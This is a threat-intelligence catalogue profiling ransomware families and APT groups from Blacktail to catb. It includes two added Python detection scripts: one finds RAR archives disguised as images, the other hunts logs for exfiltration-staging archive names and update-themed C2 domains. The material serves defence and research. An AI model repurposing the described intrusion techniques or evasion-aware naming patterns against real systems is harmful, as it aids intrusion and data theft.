Blacktail is a cybercrime group that has gained attention for its ransomware campaigns, particularly the Buhti ransomware. They are known for using custom-built data exfiltration tools and have been observed exploiting vulnerabilities in both Windows and Linux systems.

Blacktor

Blacktor is an active extortion or ransomware group tracked by RansomLook.

Blackwater

Blackwater is an active extortion or ransomware group tracked by RansomLook.

Blackwood

Blackwood is a China-aligned APT group that has been active since at least 2018. They primarily engage in cyberespionage operations targeting individuals and companies in China, Japan, and the United Kingdom. Blackwood utilizes sophisticated techniques such as adversary-in-the-middle attacks to deliver their custom implant, NSPX30, through updates of legitimate software. They also have the capability to hide the location of their command and control servers by intercepting traffic generated by the implant.

BlackWorm

BlackWorm is a ransomware infection that encrypts the victim's files and then does everything it can to prevent them from being restored. It demands $200 for the decryption key, but there is no guarantee that the operators will actually deliver a decryption tool after payment.

BladedFeline

BladedFeline is an Iran-aligned APT group that has been active since at least 2017, targeting Iraqi and Kurdish government officials for cyberespionage. The group employs a variety of tools, including the Shahmaran backdoor, Whisper, and PrimeCache, which is a malicious IIS module. BladedFeline utilizes techniques such as spearphishing (T1566), exploiting public-facing applications (T1190), and timestomping to maintain access and exfiltrate data. The group is assessed with medium confidence to be a subgroup of OilRig, focusing on strategic access to high-ranking officials in the region.

BladeHawk

BladeHawk is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Blank

Ransomware

BleedGreen Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread using email spam, fake updates, malicious attachments and similar vectors. It encrypts all common file types, including music, MS Office and Open Office documents, pictures, videos and shared online files. The ransom is $500 in bitcoin. It requires .NET Framework 4.0, installs itself in the system startup and displays a ransom note like the one shown here: https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg

Blind

Ransomware

Blitzkrieg

Ransomware

Blocatto

Ransomware Based on HiddenTear

BlockFile12

Ransomware

Blocky

Ransomware

BloodJaws

Ransomware

Blooper

Ransomware

Blue Termite

Blue Termite is a group of suspected Chinese origin active in Japan.

Blue Tsunami

Blue Tsunami, also known as Black Cube, is a cyber mercenary group associated with the private intelligence firm Black Cube. They target individuals in various industries, including human rights, finance, and consulting. Blue Tsunami engages in social engineering and uses techniques such as honeypot profiles, fake jobs, and fake companies to gather human intelligence for their clients. LinkedIn and Microsoft recently took down numerous fake accounts and company pages linked to Blue Tsunami.

BlueBottle

Bluebottle, a cyber-crime group that specializes in targeted attacks against the financial sector, is continuing to mount attacks on banks in Francophone countries. The group makes extensive use of living off the land, dual-use tools, and commodity malware, with no custom malware deployed in this campaign.

Bluebox

Bluebox is an active extortion or ransomware group tracked by RansomLook.

BlueCheeser

Ransomware

BlueEagle

Ransomware

BlueHornet

BlueHornet is an advanced persistent threat group targeting government organizations in China, North Korea, Iran, and Russia. They have compromised and leaked data from other APT groups like Kryptonite Panda and Lazarus Group. BlueHornet has been involved in campaigns such as Operation Renminbi, Operation Ruble, and Operation EUSec, focusing on exfiltrating region-specific data and selling it on the dark web. They have also been known to collaborate with different threat actors and have recently disclosed a zero-day exploit in NGINX 1.18.

Bluerose

Ransomware

Bluesky

Ransomware

b0 Group

b0 Group is an active extortion or ransomware group tracked by RansomLook.

Bober

Bober is an active extortion or ransomware group tracked by RansomLook.

Bohrium

Bohrium is an Iranian threat actor that has been involved in spear-phishing operations targeting organizations in the US, Middle East, and India. They often create fake social media profiles, particularly posing as recruiters, to trick victims into running malware on their computers. Microsoft's Digital Crimes Unit has taken legal action and seized 41 domains used by Bohrium to disrupt their activities. The group has shown a particular interest in sectors such as technology, transportation, government, and education.

BOK

Ransomware

Bolivarian National Intelligence Service

Bolivarian National Intelligence Service - Servicio Bolivariano de Inteligencia (SEBIN)

Bonacigroup

Bonacigroup is an active extortion or ransomware group tracked by RansomLook.

Bondnet

Bondnet is a threat actor that deploys backdoors and cryptocurrency miners. They use high-performance bots as C2 servers and configure reverse RDP environments on compromised systems. Bondnet has infected over 15,000 Windows server machines worldwide, primarily targeting Windows Server 2008 R2 systems. The botnet is used for mining cryptocurrencies like Monero, ByteCoin, RieCoin, and ZCash, potentially earning the operator thousands of dollars per day.

Bonsoir

Ransomware

Boolka

Boolka is a threat actor known for infecting websites with malicious JavaScript scripts for data exfiltration. They have been carrying out opportunistic SQL injection attacks since at least 2022. Boolka has developed a malware delivery platform based on the BeEF framework and has been distributing the BMANAGER trojan. Their activities demonstrate a progression from basic website infections to more sophisticated malware operations.

BooM

Ransomware

BoooamCrypt

Ransomware

Booyah

Ransomware EXE was replaced to neutralize threat

Border Guard (Poland)

Operations and Investigations Directorate of the Border Guard Headquarters - Zarząd Operacyjno-Śledczy Komendy Głównej Straży Granicznej (KGSG, ZOŚ, KGSG)

Boris HT

Ransomware

BOSON SPIDER

BOSON SPIDER is a cybercriminal group that was first identified in 2015 and then inexplicably went dark in the spring of 2016. It appears to be a tightly knit group operating out of Eastern Europe. The group has used a variety of distribution mechanisms, including the infamous (and now defunct) Angler exploit kit and obfuscated JavaScript to reduce detection by antivirus solutions.

BOSS SPIDER

Throughout 2018, CrowdStrike Intelligence tracked BOSS SPIDER as it regularly updated Samas ransomware and received payments to known Bitcoin (BTC) addresses. This consistent pace of activity came to an abrupt halt at the end of November 2018 when the U.S. DoJ released an indictment for Iran-based individuals Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, alleged members of the group.

Boulder Bear

First observed activity in December 2013.

bqtlock

aka BaqiyatLock

br0k3r

Br0k3r is not a conventional ransomware gang, but rather an Iran-linked cyber espionage and access brokerage group leveraging its foothold within victim networks to facilitate ransomware operations. Active since around 2017, the group provides privileged domain access—often sold or shared directly—with known ransomware operators such as ALPHV/BlackCat, NoEscape, and RansomHouse, receiving a portion of each successful ransom payout. Victims have included U.S. schools, municipal governments, financial and healthcare organizations, as well as targets in Israel, Azerbaijan, and the UAE. Br0k3r’s strategy merges espionage with criminal collaboration, allowing them to support both state-aligned intelligence objectives and financial incentives.

brain cipher

In mid-June 2024, a new ransomware operation named Brain Cipher emerged, notably targeting Indonesia's National Data Center. This attack disrupted immigration operations at airports and various other government services. The payload employed by this group is based on the leaked LockBit 3.0 builder. Comparative analyses have confirmed significant similarities between Brain Cipher and LockBit 3.0 samples. Notably, the attackers modified the ransomware to not only append a new extension to encrypted files but also to encrypt the filenames themselves. Additionally, it was identified that the group appears to be in its early stages, as evidenced by their use of the leaked LockBit 3.0 builder and their recent operations. After encrypting the data, the ransomware generates ransom notes named “added_extension.README.txt.” These notes contain a description of what occurred and a link to the attackers' website hosted on the Tor network.

BrainCrypt Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread using email spam, fake updates, malicious attachments and similar vectors. It encrypts all common file types, including music, MS Office and Open Office documents, pictures, videos and shared online files. So far the victims are from Belarus and Germany.

BrainLag

Ransomware

BRansomware

Ransomware

Bravox

Bravox is an active extortion or ransomware group tracked by RansomLook.

BrazenBamboo

BrazenBamboo is a Chinese state-affiliated threat actor known for developing the LIGHTSPY, DEEPDATA, and DEEPPOST malware families. Its infrastructure includes capabilities for zero-day exploitation, specifically targeting vulnerabilities in products such as FortiClient, and employs a command-and-control architecture that supports multi-platform operations. Volexity's analysis indicates that BrazenBamboo is a well-resourced entity with a focus on domestic targets, utilizing custom analyst software to manage data collected from its malware. The ongoing development of its malware families is evidenced by the timestamps associated with the latest payloads.

Brazilian Globe

Ransomware

Brazilian Intelligence Agency

Brazilian Intelligence Agency (ABIN)

Brazilian

Ransomware Based on EDA2

BreachLaboratory

BreachLaboratory is a cybercrime actor that specializes in the extraction and sale of sensitive financial and identity datasets from various organizations. They have claimed to exfiltrate approximately 950,000 records from Grupo Catalana Occidente and over 18,000 records from Bank Mandiri, with data including customer names, account details, and SWIFT codes. The actor operates on underground forums, selling structured datasets such as CSV files and SQL dumps, and emphasizes the validity and financial utility of the data. Their activities indicate a focus on monetization through direct database sales and potential downstream fraud enablement.

Brick

Ransomware

BrickR

Ransomware

Brigada de Investigación Tecnológica

Technological Research Brigade (BIT)

BrLock

Ransomware

BRONZE EDGEWOOD

In early 2021 CTU researchers observed BRONZE EDGEWOOD exploiting the Microsoft Exchange Server of an organization in Southeast Asia. The threat group deployed a China Chopper webshell and ran the Nishang Invoke-PowerShellTcp.ps1 script to connect back to C2 infrastructure. The threat group is publicly linked to the malware families Chinoxy, PCShare and FunnyDream. CTU researchers have discovered that BRONZE EDGEWOOD also leverages Cobalt Strike in its intrusion activity. BRONZE EDGEWOOD has been active since at least 2018 and targets government and private enterprises across Southeast Asia. CTU researchers assess with moderate confidence that BRONZE EDGEWOOD operates on behalf of the Chinese government and has a remit that covers political espionage.

BRONZE HIGHLAND

BRONZE HIGHLAND has been observed using spearphishing as an initial infection vector to deploy the MgBot remote access trojan against targets in Hong Kong. Third-party reporting suggests the threat group also targets India, Malaysia and Taiwan and leverages Cobalt Strike and the KsRemote Android RAT. CTU researchers assess with moderate confidence that BRONZE HIGHLAND operates on behalf of China and has a remit covering espionage against domestic human rights and pro-democracy advocates and nations neighbouring China.

BRONZE SPIRAL

In December 2020, the IT management software provider SolarWinds announced that an unidentified threat actor had exploited a vulnerability in their Orion Platform software to deploy a web shell dubbed SUPERNOVA. CTU researchers track the operators of the SUPERNOVA web shell as BRONZE SPIRAL and assess with low confidence that the group is of Chinese origin. SUPERNOVA was likely deployed through exploitation of CVE-2020-10148, and CTU researchers observed post-exploitation reconnaissance commands roughly 30 minutes before the web shell was deployed. This may have been indicative of the threat actor conducting scan-and-exploit activity and then triaging for victims of particular interest, before deploying SUPERNOVA and attempting to dump credentials and move laterally. BRONZE SPIRAL has been associated with previous intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property. The threat group makes extensive use of native system tools and 'living off the land' techniques.

BRONZE SPRING

BRONZE SPRING is a threat group that CTU researchers assess with high confidence operates on behalf of China in the theft of intellectual property from defense, engineering, pharmaceutical and technology companies. The threat group typically uses scan-and-exploit for initial access, deploys the China Chopper webshell for remote execution and persistence, and creates RAR archives with a '.jpg' file extension for data exfiltration. In July 2020 the U.S. Department of Justice indicted two Chinese hackers CTU researchers assess are members of the BRONZE SPRING threat group. The Department of Justice allege these hackers were responsible for compromising networks of hundreds of organisations and individuals in the U.S. and abroad since 2009, and that exfiltrated data would be passed to the Chinese Ministry of State Security or sold for financial gain.
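The exfiltration habit above (RAR archives given a '.jpg' extension) is cheap to check for, because the file header does not lie even when the extension does. The following is an added example written for this entry, not BRONZE SPRING tooling or code from the original page: it classifies files by their leading bytes and flags any file whose extension claims an image but whose header carries a RAR signature. The file names and contents are constructed, and the set of image extensions treated as suspicious is an assumption.

```python
"""Spot RAR archives that have been renamed with an image extension.

Added example for this catalogue entry; not BRONZE SPRING tooling or code
from the original page. File names and contents below are constructed.
"""
import os
from typing import Dict, List

# Magic bytes from the RAR and JPEG format specifications.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
JPEG_MAGIC = b"\xff\xd8\xff"

# Extensions that claim "this is a picture" (assumed list; extend as needed).
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}


def classify(header: bytes) -> str:
    """Return the real container type from the first bytes of a file."""
    if header.startswith(RAR5_MAGIC):
        return "rar5"
    if header.startswith(RAR4_MAGIC):
        return "rar4"
    if header.startswith(JPEG_MAGIC):
        return "jpeg"
    return "unknown"


def is_disguised_archive(name: str, header: bytes) -> bool:
    """True when the extension claims an image but the bytes say RAR."""
    ext = os.path.splitext(name)[1].lower()
    return ext in IMAGE_EXTENSIONS and classify(header) in {"rar4", "rar5"}


def scan_blobs(files: Dict[str, bytes]) -> List[str]:
    """Scan an in-memory {name: content} map; returns the suspicious names."""
    return sorted(n for n, data in files.items() if is_disguised_archive(n, data[:16]))


def scan_directory(root: str) -> List[str]:
    """Same check over a real directory tree, reading only the first 16 bytes."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            path = os.path.join(dirpath, n)
            try:
                with open(path, "rb") as fh:
                    header = fh.read(16)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if is_disguised_archive(n, header):
                hits.append(path)
    return sorted(hits)


# Constructed sample set: one real JPEG header, one RAR4 and one RAR5 archive
# renamed to an image extension, and a RAR with its honest extension (not flagged).
SAMPLE_FILES = {
    "holiday.jpg": JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00",
    "IMG_2031.jpg": RAR4_MAGIC + b"\x00" * 9,
    "scan_001.jpeg": RAR5_MAGIC + b"\x00" * 8,
    "backup.rar": RAR4_MAGIC + b"\x00" * 9,
}

if __name__ == "__main__":
    for hit in scan_blobs(SAMPLE_FILES):
        print("disguised archive:", hit)
```

Run scan_directory() against a file share or a user profile; only the first 16 bytes of each file are read, so it stays cheap on large trees. An archive with its honest extension is deliberately not flagged: the signal here is the mismatch between extension and header, not the presence of RAR files.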

BRONZE STARLIGHT

BRONZE STARLIGHT has been active since mid-2021 and targets organizations globally across a range of industry verticals. The group leverages HUI Loader to load Cobalt Strike and PlugX payloads for command and control. CTU researchers have observed BRONZE STARLIGHT deploying ransomware to compromised networks as part of name-and-shame ransomware schemes, and posting victim names to leak sites. CTU researchers assess with moderate confidence that BRONZE STARLIGHT is located in China based on observed tradecraft, including the use of HUI Loader and PlugX, which are associated with China-based threat group activity. It is plausible that BRONZE STARLIGHT deploys ransomware as a smokescreen rather than for financial gain, with the underlying motivation of stealing intellectual property or conducting espionage.

BRONZE VAPOR

BRONZE VAPOR is a targeted threat group assessed with moderate confidence to be of Chinese origin. Artefacts from tools associated with this group and open source reporting on related incidents indicate that BRONZE VAPOR has operated since at least 2017. The group conducts espionage against multiple industries including semiconductors, aviation and telecommunications. CTU researchers assess BRONZE VAPOR's intent to be information theft, with operations focused on intellectual property (semiconductors) and personally identifiable information such as traveller records (aviation). Compromise of telecommunications companies can yield personally identifiable information and metadata on client communications such as Call Data Records (CDR). Prior to 2019 their operational focus, with some exceptions, revolved around targets in East Asia, particularly Taiwan with its thriving semiconductor industry. In 2021 details emerged in open source of attacks on at least one European semiconductor company believed to date back to 2017. In 2019 BRONZE VAPOR attacked one or more entities in the European airline sector. The group gains initial access via VPN services, may use spearphishing with 'Letter of Appointment' themed lures, and deploys Cobalt Strike along with custom data exfiltration tools against target organizations. Post-intrusion activity involves living off the land using legitimate tools and commands available within the victim environment, as well as AceHash for credential harvesting, WATERCYCLE for data exfiltration and STOCKPIPE for proxying information through Microsoft Exchange servers over email. BRONZE VAPOR uses a set of tactics that, although not individually unique, when viewed in aggregate create a relatively distinct playbook. Intrusions begin with credential-based attacks against an existing remote access solution (Citrix, VPN etc.) or B2B network access.
Cobalt Strike is deployed into the environment and further access is then conducted via Cobalt Strike Beacon and other features of the platform. SharpHound is deployed to map out the victim's Active Directory infrastructure and collect critical information about the domain, including important account names. Command and control infrastructure is hosted on subdomains of Azure and Appspot services to blend in with legitimate traffic. The threat actor also registers their own domains for command and control, often with a "sync" or "update" related theme. WinRAR is commonly used for compressing data prior to exfiltration. Filenames for these archives often involve a string of numbers and variations of the word "update". Data is exfiltrated using WATERCYCLE to cloud-based platforms such as OneDrive and Google Drive.
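The naming and infrastructure habits described above (numbered, update-themed WinRAR archives; sync/update-themed C2 labels under Azure and Appspot parents or on self-registered domains) are the kind of pattern that can be hunted in telemetry most environments already collect. The following is an added example written for this entry, not CTU's or the actor's code: it parses a simple one-event-per-line log, flags archive names and DNS queries that fit the playbook, and keeps an allowlist so that legitimate update traffic is not reported. The log format, the key=value field layout, and every host and domain name are constructed assumptions.

```python
"""Hunt for the staging and C2 naming patterns attributed above to BRONZE VAPOR.

Added example for this catalogue entry, not CTU or BRONZE VAPOR material.
The log lines, the key=value layout, and every host and domain name are
constructed for the example; treat hits as leads to triage, not verdicts.
"""
import re
from typing import Dict, List, Tuple

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Archive basename with a run of four or more digits AND an "update" variant,
# e.g. 13927641_update.rar or 4820113_updates.zip.
ARCHIVE_NAME = re.compile(r"^(?=.*\d{4,})(?=.*updat)[^\\/]+\.(?:rar|zip|7z)$", re.I)
ARCHIVE_IN_CMD = re.compile(r'([^\s"\\]+\.(?:rar|zip|7z))', re.I)
THEMED_LABEL = re.compile(r"sync|updat", re.I)
# Cloud parents the actor is reported to hide C2 under (assumed list).
CLOUD_PARENTS = (".cloudapp.azure.com", ".azurewebsites.net", ".appspot.com")
# "update" is also the commonest word in legitimate traffic; allowlist it.
BENIGN_PARENTS = (".microsoft.com", ".windowsupdate.com", ".windows.com")


def parse_line(line: str) -> Dict[str, str]:
    """'EVENT k=v k="v with spaces"' -> dict with the type under 'event'."""
    event, _, rest = line.partition(" ")
    fields = {k: v.strip('"') for k, v in KV.findall(rest)}
    fields["event"] = event
    return fields


def suspicious_archive(path: str) -> bool:
    """True for a numbered, update-themed archive name (any path prefix)."""
    base = path.replace("\\", "/").rsplit("/", 1)[-1]
    return ARCHIVE_NAME.match(base) is not None


def suspicious_host(fqdn: str) -> str:
    """Reason string for a sync/update-themed host, '' if it looks ordinary."""
    fqdn = fqdn.lower().rstrip(".")
    if fqdn.endswith(BENIGN_PARENTS):
        return ""
    labels = fqdn.split(".")[:-1]  # never match on the TLD itself
    if not any(THEMED_LABEL.search(label) for label in labels):
        return ""
    if fqdn.endswith(CLOUD_PARENTS):
        return "sync/update-themed label under a cloud platform parent"
    return "sync/update-themed hostname"


def hunt(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (host, reason, indicator) for every line matching a pattern."""
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        ev = parse_line(line)
        host = ev.get("host", "?")
        if ev["event"] == "FILE_CREATE" and suspicious_archive(ev.get("path", "")):
            hits.append((host, "numbered update-themed archive created", ev["path"]))
        elif ev["event"] == "PROCESS" and "winrar" in ev.get("image", "").lower():
            for name in ARCHIVE_IN_CMD.findall(ev.get("cmdline", "")):
                if suspicious_archive(name):
                    hits.append((host, "WinRAR staging numbered update-themed archive", name))
        elif ev["event"] == "DNS":
            reason = suspicious_host(ev.get("query", ""))
            if reason:
                hits.append((host, reason, ev["query"]))
    return hits


# Constructed sample telemetry (not real events).
SAMPLE_LOG = [
    r"FILE_CREATE host=WS-0412 user=jsmith path=C:\Users\jsmith\AppData\Local\Temp\13927641_update.rar",
    "DNS host=WS-0412 query=sync-update.appspot.com",
    "DNS host=WS-0412 query=mail.example.org",
    r"FILE_CREATE host=WS-0412 user=jsmith path=C:\Users\jsmith\Documents\Q3_report.docx",
    "DNS host=SRV-01 query=updates-sync.cloudapp.azure.com",
    r'PROCESS host=WS-0412 image="C:\Program Files\WinRAR\WinRAR.exe" cmdline="WinRAR.exe a -r 4820113_updates.rar D:\Finance"',
    "DNS host=WS-0412 query=download.windowsupdate.com",
    "DNS host=SRV-01 query=cdn.sync-update-service.net",
]

if __name__ == "__main__":
    for host, reason, indicator in hunt(SAMPLE_LOG):
        print(f"{host}: {reason}: {indicator}")
```

The allowlist matters more than the match patterns: "update" is the most common word in legitimate Microsoft traffic, so without BENIGN_PARENTS the DNS rule would page on every patch cycle. Tune both tuples to the environment, and correlate a DNS hit with the WinRAR or FILE_CREATE hit on the same host before treating it as anything more than a lead.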

Brotherhood

Brotherhood is an active extortion or ransomware group tracked by RansomLook.

Browlock

Ransomware (no local encryption; browser only)

BTCamant Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread using email spam, fake updates, malicious attachments and similar vectors. It encrypts all common file types, including music, MS Office and Open Office documents, pictures, videos and shared online files. The original name is Mission 1996 or Mission: "Impossible" (1996), after the film.

BtcKING

Ransomware

BTCLocker Ransomware

It most likely targets English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be affected. It is spread using email spam, fake updates and malicious attachments. All common file types are encrypted, including music, MS Office and Open Office documents, pictures, videos and shared online files.

BTCWare-Aleta

Ransomware

BTCWare-Gryphon

Ransomware

BTCWare-Master

Ransomware

BTCWare-Nuclear

Ransomware

BTCWare-Onyon

Ransomware

BTCWare-PayDay

Ransomware

BTCWare

Ransomware (related to, or a new version of, CryptXXX)

BTCWare-Wyvern

Ransomware

Bucbi

Ransomware (no file name change, no extension added)

Bud

Ransomware

Buddyransome

Buddyransome is an active extortion or ransomware group tracked by RansomLook.

Budminer

Based on the evidence we have presented, Symantec attributed the activity involving the Dripion malware to the Budminer advanced threat group. While we have not seen new campaigns using Taidoor malware since 2014, we believe the Budminer group has changed tactics to avoid detection after being outed publicly in security white papers and blogs over the past few years.

BugWare

Ransomware

BuhTrap

Buhtrap has been active since 2014; however, their first attacks against financial institutions were only detected in August 2015. Earlier, the group had focused solely on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks. From August 2015 to February 2016 Buhtrap conducted 13 successful attacks against Russian banks for a total of 1.8 billion rubles ($25.7 million). The number of successful attacks against Ukrainian banks has not been identified. Buhtrap is the first criminal group observed using a network worm to infect the bank's entire infrastructure, which significantly increases the difficulty of removing all malicious components from the network. As a result, banks have to shut down the whole infrastructure, which delays customer service and causes additional losses. The malware intentionally scans for machines running the automated Bank-Customer system of the Central Bank of Russia (referred to below as BCS CBR). We have not identified incidents involving online money transfer systems, ATMs or payment gateways, which are known to be of interest to other criminal groups.

BulbaCrypt HT

Ransomware

Bundesamt für Verfassungsschutz

Bundesamt für Verfassungsschutz (BfV): Federal Office for the Protection of the Constitution

Bundesnachrichtendienst

Bundesnachrichtendienst (BND): Federal Intelligence Service

Buran

Buran is a new version of the Vega ransomware strain (a.k.a. Jamper, Ghost, Buhtrap) that attacked accountants from February through April 2019. The new Buran ransomware first was discovered by nao_sec in June 2019, delivered by the RIG Exploit Kit, as reported by BleepingComputer.

Bureau of Intelligence and Research

Bureau of Intelligence and Research (IR)

Bureau of Intelligence (BI)

Bureau of Intelligence (BI)

Bureau of Investigation (Taiwan)

Investigation Bureau (MJIB)

Bureau of Military Intelligence

Military Intelligence Bureau (MIB)

Bureau of National Investigations

Bureau of National Investigations (BNI) – (Internal Intelligence Agency)

Bureau Of Special Investigation

Bureau Of Special Investigation (BSI)

BuyUnlockCode

Ransomware (does not delete shadow copies)

BWall

Ransomware

Bytesfromheaven

Bytesfromheaven is an active extortion or ransomware group tracked by RansomLook.

ByteToBreach

ByteToBreach is a prolific cybercriminal who operates across multiple platforms, including DarkForums and Telegram, and has been active since at least June 2025. The actor exploits known vulnerabilities in cloud and corporate infrastructure, reuses stolen credentials, and relies on brute force or misconfigurations for initial access, focusing on exfiltration of sensitive data from high-value targets. ByteToBreach has established a professional-looking website to promote their services and has demonstrated credible activity, with many claims supported by verifiable proof.

C0hen Locker

Ransomware

c3rb3r

Cerber ransomware, active since 2016, has resurfaced occasionally using the name C3RB3R. It operates as a semi-private Ransomware-as-a-Service (RaaS) and targets both Windows and Linux environments. Cerber typically uses AES + RSA cryptographic methods and appends the .L0CK3D extension to encrypted files. It executes operations via phishing, malicious macros, and has even leveraged vulnerabilities such as Atlassian Confluence’s CVE-2023-22518 for deployment. Victims are directed to Tor-hosted payment portals for decryption instructions.

CA$HOUT

Ransomware

Cabinet Intelligence and Research Office

Cabinet Intelligence and Research Office (CIRO)

CACTUS Ransomware Actors

This Group object reflects the tools & TTPs observed in use by threat actors known to deploy CACTUS, a ransomware that researchers believe has been used since at least March 2023.[[Kroll CACTUS Ransomware May 10 2023](/references/f50de2f6-465f-4cae-a79c-cc135ebfee4f)] Specific pre- and post-exploit behaviors may vary among intrusions carried out by distinct actors or actor clusters. TTPs associated with the CACTUS ransomware binary itself can be found in the separate dedicated Software object.

cactus

The CACTUS ransomware is said to have emerged around March 2023. The group became known for exploiting vulnerabilities, particularly in VPN appliances, to gain initial access and maintain a presence within the victim's infrastructure. Little else is publicly known about the operators. Following encryption, a ransom note named 'cAcTuS.readme.txt' is created and encrypted files are given the '.cts1' extension; data exfiltration and victim extortion have been conducted through the Tox messaging service. The binary uses obfuscation to conceal its activity, including UPX packing, and relies on OpenSSL for its encryption primitives (AES-OCB and ChaCha20-Poly1305), alongside other tricks such as system reinitializations.

Cadelle

Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, it’s likely that activity began well before this date. Command-and-control (C&C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.

CainXPii

Ransomware

Caliente Bandits

Caliente Bandits is a highly active threat group that targets multiple industries, including finance and entertainment. They distribute the Bandook remote access trojan using Spanish-language lures through low-volume email campaigns. The group primarily impacts individuals with Spanish surnames and conducts reconnaissance to obtain employee data. They masquerade as companies in South America and use Hotmail or Gmail email addresses.

Callisto

The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.

Calypso

The activity of the Calypso group was first detected by specialists of PT Expert Security Center in March 2019, during threat-hunting work. As a result, many malware samples belonging to this group were obtained, and affected organizations and the attackers' control servers were identified. According to our data, the group has been active since at least September 2016. The main goal of the group is to steal confidential data; the main victims are government agencies in Brazil, India, Kazakhstan, Russia, Thailand and Turkey. Our data suggest that the group has Asian roots. Description translated from Russian.

Camaro Dragon

In early 2023, the Check Point Incident Response Team (CPIRT) team investigated a malware incident at a European healthcare institution involving a set of tools mentioned in the Avast report in late 2022. The incident was attributed to Camaro Dragon, a Chinese-based espionage threat actor whose activities overlap with activities tracked by different researchers as Mustang Panda and LuminousMoth, whose focus is primarily on Southeast Asian countries and their close peers.

Canada Border Services Agency

Canada Border Services Agency (CBSA) Immigrations Intelligence

Canadian Coast Guard

Canadian Coast Guard (CCG)

Canadian Forces Military Police

Canadian Forces National Counter-Intelligence Unit (DND) operated by the Canadian Forces Military Police Group

Canadian Security Intelligence Service

Canadian Security Intelligence Service (CSIS)

Cancer Ransomware FAKE

It targets English-speaking users and can therefore affect victims worldwide. It is spread using email spam, fake updates, malicious attachments and similar vectors. It is trollware rather than true ransomware: it does not encrypt files but makes the computer behave erratically. It is meant to be annoying and is hard to remove from the PC, but removal is possible.

Caracal Kitten

Caracal Kitten is an APT group that has been targeting activists associated with the Kurdistan Democratic Party. They employ a mobile remote access Trojan to gain unauthorized access to victims' devices. The group disguises their malware as legitimate mobile apps, tricking users into installing them and granting the hackers access to their personal data.

Caramel Tsunami

Caramel Tsunami, also tracked as Candiru, is a threat actor that specializes in spyware attacks. It has recently resurfaced with an updated toolset and zero-day exploits, targeting specific victims through watering hole attacks. Candiru has been observed exploiting vulnerabilities in popular browsers like Google Chrome and using third-party signed drivers to gain access to the Windows kernel. The actor has also been linked to other spyware vendors and has been associated with extensive abuses of its surveillance tools.

Carderbee

Symantec recently reported on activity attributed to a threat actor group dubbed Carderbee. In the campaign, the threat actors target entities in Hong Kong and other regions of Asia via a supply chain attack leveraging the legitimate Cobra DocGuard software. The activity began as early as September 2022.

CardinalLizard

CardinalLizard, a cyber threat actor linked to China, has targeted entities in Asia since 2018. Their methods include spear-phishing, custom malware with anti-detection features, and potentially shared infrastructure with other actors.

Careto

This threat actor targets governments, diplomatic missions, private companies in the energy sector, and academics for espionage purposes. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name "Mask" comes from the Spanish slang word "Careto" ("Ugly Face" or "Mask") which the authors included in some of the malware modules. More than 380 unique victims in 31 countries have been observed to date. What makes "The Mask" special is the complexity of the toolset used by the attackers. This includes an extremely sophisticated malware, a rootkit, a bootkit, 32- and 64-bit Windows versions, Mac OS X and Linux versions and possibly versions for Android and iPad/iPhone (Apple iOS).

Carmine Tsunami

Carmine Tsunami is a threat actor linked to an Israel-based private sector offensive actor called QuaDream. QuaDream sells a platform called REIGN to governments for law enforcement purposes, which includes exploits, malware, and infrastructure for data exfiltration from mobile devices. Carmine Tsunami is associated with the iOS malware called KingsPawn and has targeted civil society victims, including journalists, political opposition figures, and NGO workers, in various regions. Its infrastructure is built on commodity domain registrars and inexpensive cloud hosting providers, typically one domain per IP address, with free Let's Encrypt TLS certificates.

CashRewindo

CashRewindo is a sophisticated threat actor leveraging aged domains in global malvertising campaigns to direct victims to investment scam sites. The group employs TTPs such as flipping between scam ads and innocuous content, as well as A/B testing to exploit time-based creative verification systems. Their operations are characterized by tailored campaigns that utilize localized language and imagery across diverse regions, including Europe, Asia, Africa, and the Americas. Additionally, CashRewindo smuggles malicious code within common JavaScript libraries to enhance their effectiveness.

Cassetto Ransomware

Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.

Cat Scientist Actor

"Cat Scientist" is a username used by a threat actor on underground cybercriminal forums. The actor was observed attempting to sell access to a corporate network gained through compromise of Microsoft Windows RDWeb Virtual Desktop software.[[Dark Web Informer LinkedIn Cat Scientist January 2025](/references/4678131f-7079-4a5f-ac47-06faa3052d8f)]

catb

CatB ransomware was first observed in late 2022 and gained attention for abusing DLL hijacking in the Microsoft Distributed Transaction Coordinator (MSDTC) service, which loads the malicious payload through DLL sideloading. The malware arrives as a two-stage dropper: the first DLL unpacks and launches the main payload (commonly named oci.dll), which then encrypts files using hybrid RSA/AES cryptography. Unlike conventional ransomware, CatB does not rename files or drop separate ransom notes; instead it prepends the ransom message to the start of each encrypted file, which defeats extension- and note-based detection. Victims are instructed to contact the attackers by email (catB9991@protonmail.com or fishA001@protonmail.com), with the ransom demand escalating daily. Initial analysis suggests CatB may be a rebrand or evolution of Pandora ransomware, sharing code artifacts and operational behavior.
